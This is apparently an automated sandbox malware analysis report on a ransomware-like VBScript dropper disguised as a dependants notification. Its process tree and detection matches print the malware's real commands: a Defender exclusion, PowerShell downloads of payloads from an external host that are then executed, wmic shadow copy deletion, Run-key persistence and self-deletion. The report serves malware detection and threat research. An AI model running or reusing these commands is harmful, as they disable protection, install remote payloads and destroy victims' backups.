Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NOTIFICATION_OF_DEPENDANTS.vbs

Overview

General Information

Sample name:NOTIFICATION_OF_DEPENDANTS.vbs
Analysis ID:1575761
MD5:50fb3c05b170951a73f8dd0df24c762c
SHA1:1353a8039e99590cdf9995a7bf06a662fdf4203a
SHA256:07d3cb8a9cfd33b0d7cbf8af107a09952aadbc8a911c1b22bf5aea2619d7ae26
Tags:vbsuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Delete shadow copy via WMIC
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Deletes shadow drive data (may be related to ransomware)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
May encrypt documents and pictures (Ransomware)
Modifies existing user documents (likely ransomware behavior)
Overwrites Mozilla Firefox settings
Powershell drops PE file
Sigma detected: Control Panel Items
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation STDIN+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Sigma detected: Suspicious Ping/Del Command Combination
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Command Line Path Traversal Evasion Attempt
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • wscript.exe (PID: 6760 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 6844 cmdline: "C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6896 cmdline: powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf MD5: 04029E121A0CFA5991749937DD22A1D9)
        • chrome.exe (PID: 7092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
          • chrome.exe (PID: 2856 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2012,i,1751520470238867524,1103501231099164718,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • cmd.exe (PID: 7152 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6356 cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmp MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 7752 cmdline: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7856 cmdline: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 7008 cmdline: "C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cpl MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • control.exe (PID: 7608 cmdline: control C:\Users\user\AppData\Local\Temp/fjeljies.cpl MD5: 11C18DBF352D81C9532A8EF442151CB1)
        • rundll32.exe (PID: 4716 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user\AppData\Local\Temp/fjeljies.cpl MD5: EF3179D498793BF4234F708D3BE28633)
          • rundll32.exe (PID: 8084 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\Users\user\AppData\Local\Temp/fjeljies.cpl MD5: 889B99C52A60DD49227C5E485A016679)
            • cmd.exe (PID: 7520 cmdline: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 2376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 5592 cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • cmd.exe (PID: 7032 cmdline: cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 6868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 7216 cmdline: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • cmd.exe (PID: 7776 cmdline: cmd /c %temp%/eryy65ty.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 1876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • eryy65ty.exe (PID: 8180 cmdline: C:\Users\user\AppData\Local\Temp/eryy65ty.exe MD5: 9049FABA5517305C44BD5F28398FB6B9)
                • WMIC.exe (PID: 6952 cmdline: c:\IgQfcH\IgQf\..\..\Windows\IgQf\IgQf\..\..\system32\IgQf\IgQf\..\..\wbem\IgQf\IgQfc\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
                  • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • WMIC.exe (PID: 7868 cmdline: c:\ONkVQK\ONkV\..\..\Windows\ONkV\ONkV\..\..\system32\ONkV\ONkV\..\..\wbem\ONkV\ONkVQ\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
                  • conhost.exe (PID: 2224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • cmd.exe (PID: 1192 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 5424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • PING.EXE (PID: 7800 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • svchost.exe (PID: 6424 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • eryy65ty.exe (PID: 8052 cmdline: "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: 9049FABA5517305C44BD5F28398FB6B9)
    • WMIC.exe (PID: 7120 cmdline: c:\HdMVWr\HdMV\..\..\Windows\HdMV\HdMV\..\..\system32\HdMV\HdMV\..\..\wbem\HdMV\HdMVW\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 6420 cmdline: c:\MqHRzl\MqHR\..\..\Windows\MqHR\MqHR\..\..\system32\MqHR\MqHR\..\..\wbem\MqHR\MqHRz\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 6364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6388 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 4132 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • eryy65ty.exe (PID: 7040 cmdline: "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: 9049FABA5517305C44BD5F28398FB6B9)
    • WMIC.exe (PID: 6200 cmdline: c:\ihzCRF\ihzC\..\..\Windows\ihzC\ihzC\..\..\system32\ihzC\ihzC\..\..\wbem\ihzC\ihzCR\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 4444 cmdline: c:\sZJidg\sZJi\..\..\Windows\sZJi\sZJi\..\..\system32\sZJi\sZJi\..\..\wbem\sZJi\sZJid\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5612 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 6000 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • notepad.exe (PID: 6236 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
No configs have been found
No yara matches

Operating System Destruction

barindex
Source: Process startedAuthor: Joe Security: Data: Command: c:\IgQfcH\IgQf\..\..\Windows\IgQf\IgQf\..\..\system32\IgQf\IgQf\..\..\wbem\IgQf\IgQfc\..\..\wmic.exe shadowcopy delete, CommandLine: c:\IgQfcH\IgQf\..\..\Windows\IgQf\IgQf\..\..\system32\IgQf\IgQf\..\..\wbem\IgQf\IgQfc\..\..\wmic.exe shadowcopy delete, CommandLine|base64offset|contains: (, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp/eryy65ty.exe, ParentImage: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ParentProcessId: 8180, ParentProcessName: eryy65ty.exe, ProcessCommandLine: c:\IgQfcH\IgQf\..\..\Windows\IgQf\IgQf\..\..\system32\IgQf\IgQf\..\..\wbem\IgQf\IgQfc\..\..\wmic.exe shadowcopy delete, ProcessId: 6952, ProcessName: WMIC.exe

System Summary

barindex
Source: Process startedAuthor: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_): Data: Command: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7752, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, ProcessId: 7856, ProcessName: powershell.exe
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6760, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, ProcessId: 7752, ProcessName: cmd.exe
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmp, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmp, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6760, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmp, ProcessId: 7152, ProcessName: cmd.exe
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6760, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, ProcessId: 7752, ProcessName: cmd.exe
Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\eryy65ty.exe .dD...6dD ..9..........P.$....D "#@...."....8...c..S..-"..#...p.......S.}...............................<.J..l-p.r.....E.........-<.<.bL.........).b....^8brDb....9^....8...:<.b.X.XX.., EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ProcessId: 8180, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XPSUDTARW
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmp, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmp, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6760, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmp, ProcessId: 7152, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades): Data: Command: c:\IgQfcH\IgQf\..\..\Windows\IgQf\IgQf\..\..\system32\IgQf\IgQf\..\..\wbem\IgQf\IgQfc\..\..\wmic.exe shadowcopy delete, CommandLine: c:\IgQfcH\IgQf\..\..\Windows\IgQf\IgQf\..\..\system32\IgQf\IgQf\..\..\wbem\IgQf\IgQfc\..\..\wmic.exe shadowcopy delete, CommandLine|base64offset|contains: (, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp/eryy65ty.exe, ParentImage: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ParentProcessId: 8180, ParentProcessName: eryy65ty.exe, ProcessCommandLine: c:\IgQfcH\IgQf\..\..\Windows\IgQf\IgQf\..\..\system32\IgQf\IgQf\..\..\wbem\IgQf\IgQfc\..\..\wmic.exe shadowcopy delete, ProcessId: 6952, ProcessName: WMIC.exe
Source: Process startedAuthor: Ilya Krestinichev: Data: Command: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe", CommandLine: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp/eryy65ty.exe, ParentImage: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ParentProcessId: 8180, ParentProcessName: eryy65ty.exe, ProcessCommandLine: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe", ProcessId: 1192, ProcessName: cmd.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ProcessId: 6760, ProcessName: wscript.exe
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\eryy65ty.exe .dD...6dD ..9..........P.$....D "#@...."....8...c..S..-"..#...p.......S.}...............................<.J..l-p.r.....E.........-<.<.bL.........).b....^8brDb....9^....8...:<.b.X.XX.., EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ProcessId: 8180, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XPSUDTARW
Source: Process startedAuthor: Christian Burkard (Nextron Systems): Data: Command: c:\IgQfcH\IgQf\..\..\Windows\IgQf\IgQf\..\..\system32\IgQf\IgQf\..\..\wbem\IgQf\IgQfc\..\..\wmic.exe shadowcopy delete, CommandLine: c:\IgQfcH\IgQf\..\..\Windows\IgQf\IgQf\..\..\system32\IgQf\IgQf\..\..\wbem\IgQf\IgQfc\..\..\wmic.exe shadowcopy delete, CommandLine|base64offset|contains: (, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp/eryy65ty.exe, ParentImage: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ParentProcessId: 8180, ParentProcessName: eryy65ty.exe, ProcessCommandLine: c:\IgQfcH\IgQf\..\..\Windows\IgQf\IgQf\..\..\system32\IgQf\IgQf\..\..\wbem\IgQf\IgQfc\..\..\wmic.exe shadowcopy delete, ProcessId: 6952, ProcessName: WMIC.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6760, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, ProcessId: 7752, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmp, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmp, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6760, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmp, ProcessId: 7152, ProcessName: cmd.exe
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ProcessId: 8180, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6760, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl, ProcessId: 7752, ProcessName: cmd.exe
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs", ProcessId: 6760, ProcessName: wscript.exe
